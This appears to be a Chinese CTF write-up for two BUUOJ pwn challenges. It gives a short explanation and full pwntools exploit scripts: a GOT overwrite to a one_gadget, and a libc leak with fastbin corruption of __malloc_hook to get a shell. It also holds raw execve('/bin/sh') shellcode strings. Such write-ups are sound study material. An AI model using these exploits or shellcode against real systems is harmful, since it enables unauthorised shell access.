PWN1-bbbaby
这个题目就是一个one_gadget+覆写got表的题,,
因为我做题用了本地环境的libc,没有打通,,我还以为是自己脚本的问题,赛后发现题目给的libc是小版本的libc和我ubuntu16自带的libc版本不一,
分析题目
主函数返现当我们输入1会进入输入data的地方,输入0会进入some_read()(这里存在一个修改地址的操作)
在这里我们发现我们竟然可以修改指定的地址
查看保护机制发现没有开启pie。
于是有了思路,通过改写got表后四位进行爆破,让返回地址到one_gadget地址就可以成功getshell,因为got表的地址是会变化的,所以这里选择one_gadget的时候需要选择0xf开头的onegadget进行使用。
EXP
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'
#p=process("pwn1")
p=remote("node4.buuoj.cn","26388")
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
it = lambda :p.interactive()
def choice(idx):
sla("your choice",str(idx))
def exp():
choice(0)
sla("address:",(6295592))
sa("content:",p16(0x62a4))
it()
if __name__ == '__main__':
exp()
PWN2–magic
待更新
EXP
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'
context.terminal=['tmux', 'splitw', '-h']
prog = './Magic'
#elf = ELF(prog)#nc 121.36.194.21 49155
# p = process(prog,env={"LD_PRELOAD":"./libc/libc-2.23.so"})
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p = remote("node4.buuoj.cn", 25680)#nc 124.71.130.185 49155
def debug(addr,PIE=True):
debug_str = ""
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
gdb.attach(p)
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
bp = lambda bkp :pdbg.bp(bkp)
li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))
def dbgc(addr):
gdb.attach(p,"b*" + hex(addr) +"\n c")
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
sla("Input your choice: ",str(idx)+'\n\n')
# sla("Input your choice: ",str(idx))
def add(idx):
choice(1)
sa("Input the idx",str(idx)+'\x00\x00\x00')
# sl('\n\n')
# sla("Size: ",sz)
# sa("content?",cno)
def delete(idx):
choice(3)
sa("Input the idx",str(idx)+'\x00\x00\x00')
# sl('\n\n')
# def show(idx):
# choice(3)
# sla("Index: ",idx)
def edit(idx,con):
choice(2)
sa("Input the idx",str(idx)+'\x00\x00\x00')
# sl('\n')
# sla("size?",sz)
sa("Input the Magic",con)
def exp():
# debug([0x13aa])
add(0)
edit(0,'a'*8)
# delete(0)
ru('a'*8)
data = uu64(r(6))
lg('data',data)
addr = data - 0x7fe66967cd98 + 0x7fe6692b8000
mh = addr + libc.sym['__malloc_hook']
rh = addr + libc.sym['realloc']
lg('addr',addr)
one = addr + 0x4527a
#-----------------------------
delete(0)
edit(0,p64(mh-0x23))
add(0)
add(1)
lg('rh',rh)
edit(1,(0x13-8)*'a'+p64(one)+p64(rh+13))
# dbg()
add(0)
it()
if __name__ == '__main__':
exp()
发表评论